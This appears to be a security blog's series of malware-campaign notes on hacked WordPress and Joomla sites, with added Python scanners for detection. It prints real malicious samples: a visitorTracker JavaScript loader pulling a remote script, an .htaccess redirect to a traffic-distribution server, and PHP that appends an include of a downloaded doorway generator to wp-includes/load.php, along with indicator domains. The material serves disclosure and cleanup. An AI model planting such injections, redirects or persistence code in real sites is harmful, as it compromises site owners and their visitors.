visitorTracker spam-seo injector wave corrupts sites

Recently we have been seeing an increasing wave of visitorTracker malware infections.

Moreover, a lot of the infections out there are corrupted and break the infected sites. Right now the malicious code starts and ends with a visitorTracker comment tag, and many of the site's legitimate JavaScript files are injected with the malicious code as well. The outcome, in case of a successful (not broken) infection, is spam content served to visitors using mobile devices.

Part of the malicious injection:

var visitortrackerin = setInterval(function(){
    // Poll until the DOM body exists, then run the loader once.
    if(document.body != null && typeof document.body != "undefined"){
        clearInterval(visitortrackerin);
        // A global flag keeps the loader from running twice on the same page.
        if(typeof window["globalvisitor"] == "undefined"){
            window["globalvisitor"] = 1;
            var isIE = visitortrackerde();
            var isChrome = !isIE && !!window.chrome && window.navigator.vendor === "Google Inc.";
            if(visitorTracker_isMob()){
                // Mobile visitors: load the remote script with mob=1 (the spam content).
                var visitortrackervs = document.createElement("script");
                visitortrackervs.src = "http://test.com/components/com_banners/models/main_configuration/watch.php?mob=1";
                document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
            }else{
                // Desktop IE (non-Chrome) visitors get the same remote loader without the mob flag.
                if((isIE && !isChrome && !visitorTracker_isMob())){
                    var visitortrackervs = document [.] createElement("script");
                    visitortrackervs.src = "http://test.com/components/com_banners/models/main_configuration/watch.php";
                    document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
                }
            }
        }
        visitortracksdel();
    }

As mentioned, the infection is very buggy and often removes single quotes from legitimate files, which corrupts the site completely. It affects plugins, themes and even core files of WordPress and Joomla. The solution is to restore the files from a clean backup.
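A small triage scanner for this injection, added here as an example and not part of the original post: it walks a web root, flags files carrying the identifiers seen in the snippet above, and pulls out the remote watch.php URL for blocklisting. The comment-tag format (`/* visitorTracker */`) and the sample files are assumptions, since the post does not show the exact tag.

```python
import re
import tempfile
from pathlib import Path

# Identifiers are taken from the injected snippet; the comment-tag form is an
# assumption, so the marker is matched loosely and case-insensitively.
MARKER_RE = re.compile(r"/\*\s*visitorTracker\s*\*/|//\s*visitorTracker\b", re.I)
INDICATOR_RE = re.compile(
    r"visitortrackerin|globalvisitor|visitorTracker_isMob|visitortracksdel", re.I)
# The loader assigns the remote watch.php URL to .src; capture it for blocklists.
SRC_RE = re.compile(r"""\.src\s*=\s*["']([^"']+watch\.php[^"']*)["']""")

def scan_text(text):
    """Return (sorted indicator names, remote loader URLs) found in one file."""
    hits = sorted({m.group(0).lower() for m in INDICATOR_RE.finditer(text)})
    urls = SRC_RE.findall(text) if (hits or MARKER_RE.search(text)) else []
    return hits, urls

def scan_tree(root, exts=(".js", ".html", ".php")):
    """Walk a web root; map each infected file to its indicators and URLs."""
    findings = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in exts:
            hits, urls = scan_text(p.read_text(errors="replace"))
            if hits or urls:
                findings[p.relative_to(root).as_posix()] = {"indicators": hits, "urls": urls}
    return findings

# Constructed sample: a trimmed copy of the injection wrapped in marker tags,
# plus a clean jQuery-style file, written to a temp web root for the demo.
SAMPLE_INJECTED = """/* visitorTracker */
var visitortrackerin = setInterval(function(){
    if(typeof window["globalvisitor"] == "undefined"){
        var s = document.createElement("script");
        s.src = "http://test.com/components/com_banners/models/main_configuration/watch.php?mob=1";
        document.getElementsByTagName("head")[0].appendChild(s);
    }
}, 100);
/* visitorTracker */
"""
SAMPLE_CLEAN = "(function($){ $('.menu').on('click', function(){}); })(jQuery);\n"

def demo():
    """Write both samples into a temp web root and scan it."""
    with tempfile.TemporaryDirectory() as d:
        (Path(d) / "js").mkdir()
        (Path(d) / "js" / "theme.js").write_text(SAMPLE_INJECTED)
        (Path(d) / "js" / "menu.js").write_text(SAMPLE_CLEAN)
        return scan_tree(d)
```

Files that the scanner reports should be compared against a clean copy rather than edited in place, since the injector also strips quotes from files it touches.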

Secondtds.mooo[.]com .htaccess redirects

We are finding many sites infected with malicious redirects inside the .htaccess file, to secondtds.mooo[.]com/go.php?sid=3. That domain is a TDS (traffic controller) which redirects visitors to another website pushing your browser to download this malware: https://www.virustotal.com/en/file/0b6eab15961f92da95a0a4b0d55fee8a8bd0eb39fec1027aa43575802d7a199e/analysis/1441223870/

The redirect chain is:

secondtds.mooo[.]com
downserver.ignorelist[.]com
pastdownload[.]com
stds1new.computersoftwarelive[.]com
download.pastdownload[.]com
files.september-master-3[.]xyz

Here is the .htaccess content:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} go.mail.* [OR]
RewriteCond %{HTTP_REFERER}  .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER}  .*bing.* [OR]
RewriteCond %{HTTP_REFERER}  .*goto.* [OR]
RewriteCond %{HTTP_REFERER}  .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER}  .*nigma.* [OR]
RewriteCond %{HTTP_REFERER}  .*mamma.* [OR]
..
RewriteCond %{HTTP_REFERER}  .*aport.* [OR]
RewriteCond %{HTTP_REFERER}  .*search.* [OR]
RewriteCond %{HTTP_REFERER}  .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER}  .*dogpile.*
RewriteRule ^(.*)$ http://secondtds[.]mooo.com[/]go.php?sid=2 [R=301,L]

The attack is quite buggy and doesn't check whether a site is already infected, which is why the same redirect rules often appear multiple times in a single .htaccess file.

If you find this code, remove it right away!
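A parser for spotting this kind of rule, added here as an example and not code from the original post: it pairs each RewriteRule with the RewriteCond lines stacked in front of it, flags rules that send search-engine referrals to a host the site does not own, and counts duplicate copies of the same rule. The sample .htaccess is constructed from the one above with a placeholder TDS host.

```python
import re
from collections import Counter
from urllib.parse import urlparse

COND_RE = re.compile(r"^\s*RewriteCond\s+(%\{\w+\})\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)

def find_referrer_redirects(text, own_hosts=()):
    """Return (suspicious_rules, duplicate_count) for one .htaccess body.

    Apache applies the RewriteCond lines stacked before a RewriteRule to that
    rule only, so conditions are collected until a rule consumes them.
    """
    pending, suspicious, seen = [], [], Counter()
    for line in text.splitlines():
        c = COND_RE.match(line)
        if c:
            pending.append(c.group(1).upper())
            continue
        r = RULE_RE.match(line)
        if not r:
            continue
        pattern, target, flags = r.groups()
        host = urlparse(target).hostname
        # Flag: referrer-gated rule whose target is an absolute URL off-site.
        if host and host not in own_hosts and "%{HTTP_REFERER}" in pending:
            suspicious.append((pattern, target, flags or ""))
            seen[(pattern, target)] += 1
        pending = []
    duplicates = sum(n - 1 for n in seen.values())
    return suspicious, duplicates

# Constructed sample modelled on the .htaccess above. The TDS host is a
# placeholder (the campaign used secondtds.mooo[.]com) and the block appears
# twice on purpose, mimicking the injector re-adding it on a second pass.
SAMPLE_HTACCESS = """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER}  .*bing.* [OR]
RewriteCond %{HTTP_REFERER}  .*dogpile.*
RewriteRule ^(.*)$ http://tds.example.invalid/go.php?sid=2 [R=301,L]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER}  .*bing.* [OR]
RewriteCond %{HTTP_REFERER}  .*dogpile.*
RewriteRule ^(.*)$ http://tds.example.invalid/go.php?sid=2 [R=301,L]
RewriteRule ^old/(.*)$ /new/$1 [R=301,L]
"""

def demo():
    return find_referrer_redirects(SAMPLE_HTACCESS, own_hosts={"www.example.com"})
```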

GCCanada.com Malware

We are seeing a large number of sites with a malicious script from gccanada.com injected into them. The malware redirects visitors to searchmagnified.com, which in turn redirects them to freeresultsguide.com. This is the code being added to the hacked sites:

< script type='text/javascript' src="http://gccanada[.]com/jquery[.]js"

What is so bad about it? The final domain, 'freeresultsguide.com', pushes you to buy fake antivirus software with annoying messages and warnings such as:

Important security message. Please call the number provided asap to get your computer fixed. You have a virus!

If you see this gccanada code on your site, it means you got hacked. It is not from the Government of Canada, as the domain name wants you to think.

Tag-cloud-generator[.]com script redirects to parked domains

Today we found a few websites that loaded strange code from tag-cloud-generator[.]com.

The sites tried to load several image and font files from this domain, but they all returned 404 Not Found. The only live file they loaded was hxxp://www.tag-cloud-generator[.]com/js/fx2.js or its pseudo-localized copies such as hxxp://www.tag-cloud-generator[.]com/NL/js/fx2.js, hxxp://www.tag-cloud-generator[.]com/EN/js/fx2.js, hxxp://www.tag-cloud-generator[.]com/FR/js/fx2.js, etc.

The fx2.js file contains an encrypted script that randomly loads one of the following scripts:

hxxp://www.tag-cLoud-generator[.]com/b01.js
hxxp://www.tag-cLoud-generator[.]com/b02.js
hxxp://www.tag-cLoud-generator[.]com/b03.js
hxxp://www.tag-cLoud-generator[.]com/b04.js

Those scripts, in turn, redirect visitors to one of the following parked domains with ads:

www.rusoen[.]com
www.askinz[.]com
www.ad-u[.]com
www.kinkyfirehouse[.]com

Using code like this:

JavaScriptRedirectURL="http://www.ad-u[.]com/";window.top.location.href=JavaScriptRedirectURL;

All these domains, including tag-cloud-generator[.]com are registered in China. If you ever used tag-cloud-generator, make sure to remove it from your site. We will share more information if we find anything new.

Fake Social Share WordPress Plugin Creates Pharma Spam...

We found infected sites where malware created a fake WordPress plugin that generated pharma spam doorways.

Path: wp-content/plugins/social-share/wp-social-share.php

This file creates wp-content/plugins/social-share/share.php, which calls itself "WP Social Include File". It downloads a doorway generator from hxxp://api-linux . net/json/json_01.txt, writes it to wp-content/mu-plugins/mu-plugin.png and then includes that file at the bottom of wp-includes/load.php:

...
$load = '@include_once ( ABSPATH . \'wp-content/mu-plugins/mu-plugin.png\' );';
// append the include line only if load.php does not already contain it
if(strpos(@file_get_contents($path."/../wp-includes/load.php"), $load) === false){
    @file_put_contents($path."/../wp-includes/load.php", $load, FILE_APPEND);
}
...

The doorway generator uses the following URLs:

...
$processor = 'jp.apigenerator.net';
$server_door = 'hxxp://'.$processor.'/avtonom/comeon_door.php';

$url_new = $processor;
$path_new = '/avtonom/comeon_door.php';

$buypage = 'hxxp://solarkey .net/notds/gettheme_ss_incl.php';
$buy_url = 'solarkey.net';
$buy_path = '/notds/gettheme_ss_incl.php';
...
$linksurl = 'http://jp.apigenerator.net/avtonom/getlinks_003.php';
$linksurl_url = 'jp.apigenerator.net';
$linksurl_path = '/avtonom/getlinks_003.php';
...

Some of the above URLs should only be accessed using a special User-Agent:

$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6";

If you are a hosting provider, we recommend blocking HTTP requests to these external sites, to stop the spam doorways from being distributed. We will share more details as we learn more about it.
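For site owners, an audit script added here as an example (not the malware's code and not part of the original post) that checks the two artifacts described above: an include line appended to wp-includes/load.php that pulls in a file with a non-PHP extension, and files under wp-content/mu-plugins that carry an image extension but start with a PHP tag. The mini WordPress tree built by demo() is constructed for the demo; the file paths are the ones named in the post.

```python
import re
import tempfile
from pathlib import Path

# Matches the appended loader line shown above: an (@)include/require of a
# file under ABSPATH. A non-PHP extension (.png here) is the giveaway.
INCLUDE_RE = re.compile(
    r"@?(?:include|require)(?:_once)?\s*\(?\s*ABSPATH\s*\.\s*['\"]([^'\"]+)['\"]", re.I)
PHP_EXTS = {".php", ".inc", ".phtml"}

def suspicious_includes(load_php_text):
    """Return included paths whose extension is not a PHP one."""
    return [p for p in INCLUDE_RE.findall(load_php_text)
            if Path(p).suffix.lower() not in PHP_EXTS]

def php_in_non_php_files(root):
    """Return files under root with a non-PHP extension that open with a PHP tag."""
    root = Path(root)
    if not root.is_dir():
        return []
    found = []
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() not in PHP_EXTS:
            with open(p, "rb") as fh:
                head = fh.read(512)
            if b"<?php" in head or b"<?=" in head:
                found.append(p.relative_to(root).as_posix())
    return sorted(found)

def audit_wordpress(abspath):
    """Run both checks against a WordPress install rooted at abspath."""
    base = Path(abspath)
    load_php = base / "wp-includes" / "load.php"
    text = load_php.read_text(errors="replace") if load_php.exists() else ""
    return {"bad_includes": suspicious_includes(text),
            "php_disguised": php_in_non_php_files(base / "wp-content" / "mu-plugins")}

def demo():
    """Build a constructed mini WordPress tree carrying the infection and audit it."""
    with tempfile.TemporaryDirectory() as d:
        base = Path(d)
        (base / "wp-includes").mkdir()
        (base / "wp-content" / "mu-plugins").mkdir(parents=True)
        (base / "wp-includes" / "load.php").write_text(
            "<?php\nrequire_once( ABSPATH . 'wp-settings.php' );\n"
            "@include_once ( ABSPATH . 'wp-content/mu-plugins/mu-plugin.png' );")
        (base / "wp-content" / "mu-plugins" / "mu-plugin.png").write_bytes(
            b"<?php /* constructed stand-in for the doorway generator */")
        return audit_wordpress(base)
```

A hit on either check means load.php should be replaced from a clean WordPress package, not just edited, since share.php re-appends the line whenever it runs.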

RevSlider MalFrames – SoakSoak

The RevSlider SoakSoak malware campaign started with the soaksoak.ru domain (hence the name). However, over the last 2 weeks it has mutated and used different domains as the initial malware intermediary.

This is the full list so far:

  1. soaksoak.ru: First one in the list. We identified more than 100,000 sites redirecting to it.
  2. 122.155.168.105: Started just after soaksoak, leveraging the /collect.js redirection. Almost 10,000 were blacklisted and compromised with it.
  3. ads.akeemdom.com
  4. wpcache-blogger.com: Second biggest campaign after soaksoak. More than 50,000 sites compromised and still going.
  5. theme.wpcache-blogger.com
  6. phoenix-credit.com: Current one active. Also leverages the /collect.js redirection and has compromised more than 11,000 different sites.

We will keep updating this list as the domains change and the attacks mutate.

Chinese Doorway Spam – P2

We are seeing an increasing number of hacked sites with Chinese doorways promoting various counterfeit merchandise (from Louis Vuitton handbags to NFL jerseys and Canada Goose jackets).

Those doorways target both Western and Chinese web searches. Here's how they make sure the doorway correctly preserves search queries in Chinese (converting from UTF-8 to gb2312) when it processes the Google search referrer string:

if (empty($_SERVER['HTTP_REFERER'])) {
    $HTTP_Referer = "n";
} else {
    $temp = urldecode($_SERVER['HTTP_REFERER']);
    if (strpos($_SERVER['HTTP_REFERER'], 'ie=utf-8') !== false) {
        $temp = mb_convert_encoding($temp, 'gb2312', 'utf-8'); //utf-8->gb2312
    }
    $HTTP_Referer = strtolower($temp);
}

Since Google uses ie=utf-8 by default for most languages, queries containing non-ASCII characters outside Simplified Chinese will be garbled. Apparently they are only interested in English and Chinese queries.